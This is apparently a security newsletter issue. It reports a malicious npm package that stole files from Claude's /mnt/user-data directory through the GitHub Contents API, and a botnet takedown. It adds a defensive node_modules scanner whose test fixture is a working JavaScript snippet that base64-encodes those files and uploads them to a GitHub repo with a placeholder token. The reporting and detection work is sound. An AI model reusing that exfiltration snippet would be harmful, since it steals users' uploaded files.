The Intake — Thursday, May 28, 2026
On the substrate
npm package "mouse5212-super-formatter" targets Claude file-storage directory, exfiltrates via GitHub
OX Security (Bustan & Zadok, May 27); The Register (Lyons, May 27); The Hacker News (Lakshmanan, May 27)
mouse5212-super-formatter is a malicious npm package identified by OX Security as part of a campaign they name "Malware-Slop." It reads from /mnt/user-data, the directory Claude uses for uploads and outputs. The package then base64-encodes whatever it finds there and writes it to a threat-actor-controlled GitHub repository via the GitHub Contents API.
The attacker hardcoded their own GitHub private token in the payload. OX researchers extracted the token; the account behind it was created May 26 and deleted after exposure. OX observed approximately seven active exfiltrations before takedown. The package had 676 downloads and remained live on npm at the time OX published.
The package was removed. Developers who installed mouse5212-super-formatter alongside an active Claude instance have a specific exposure: whatever was sitting in /mnt/user-data, the directory Claude uses for uploads and outputs, was readable by the payload.
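A defensive check suggested by the behaviour described above, added here as an example and not code from OX Security or from the package itself: it walks a node_modules tree and flags JavaScript files that combine reads of /mnt/user-data with GitHub Contents API uploads, reporting any hardcoded GitHub token or base64 encoding found alongside. The indicator names, the regexes, the assumed GitHub token prefixes (ghp_, github_pat_) and the sample files are all constructed for this example.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators from OX Security's description of the payload: reads of Claude's
# /mnt/user-data, base64 encoding, and uploads through the GitHub Contents API
# with a hardcoded token. Token prefixes are assumed from GitHub's documented formats.
INDICATORS = {
    "claude_user_data_path": re.compile(r"/mnt/user-data"),
    "github_contents_api": re.compile(r"""api\.github\.com/repos/[^"'\s]+/contents/"""),
    "hardcoded_github_token": re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b"),
    "base64_encode": re.compile(r"""toString\(\s*['"]base64['"]\s*\)|btoa\("""),
}

def scan_file(path):
    text = Path(path).read_text(errors="ignore")
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root):
    # Flag a file only when it both reads the Claude directory and talks to the
    # Contents API; either string alone is too noisy across a real node_modules.
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if "claude_user_data_path" in hits and "github_contents_api" in hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed sample files (not the real package) so the scanner runs offline.
SUSPICIOUS_JS = """const fs = require('fs');
for (const f of fs.readdirSync('/mnt/user-data')) {
  const content = fs.readFileSync('/mnt/user-data/' + f).toString('base64');
  fetch('https://api.github.com/repos/example-org/drop/contents/' + f, { method: 'PUT',
    headers: { Authorization: 'token ghp_CONSTRUCTEDPLACEHOLDERTOKEN000000000' },
    body: JSON.stringify({ message: f, content }) }); }"""
BENIGN_JS = "module.exports = (s) => s.replace(/\\s+/g, ' ').trim();\n"

def demo():
    # Build a throwaway tree with one suspicious and one benign file, then scan it.
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp, "node_modules", "some-formatter")
        pkg.mkdir(parents=True)
        (pkg / "index.js").write_text(SUSPICIOUS_JS)
        (pkg / "util.js").write_text(BENIGN_JS)
        return scan_tree(tmp)
```

Point scan_tree at a project's real node_modules to run the same heuristic over installed packages; the benign sample shows that a formatter with no Claude or GitHub strings produces no finding.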
CrowdStrike, Google, and Shadowserver disrupt Glassworm botnet targeting developer environments
CrowdStrike Counter Adversary Operations (May 27); The Register (Lyons, May 27)
Glassworm was a developer-targeting botnet active from October 2025 through its May 27, 2026 disruption. CrowdStrike, Google, and the Shadowserver Foundation executed a coordinated takedown at 1400 UTC on May 27. Compromised machines now beacon to a CrowdStrike-operated sinkhole at 164.92.88[.]210.
The botnet spread through VS Code extensions on the OpenVSX marketplace, npm packages, and Python packages. Public GitHub repositories were also a distribution channel. Each infection deployed GlasswormRAT. For C2, the botnet used Solana blockchain transactions as the primary channel and Google Calendar events as a backup, and distributed its configuration over the BitTorrent DHT.
Glassworm targeted developer machines specifically and spread through the registries and marketplaces developers use in ordinary workflow. The sinkhole is live. CrowdStrike's blog post carries indicators of compromise.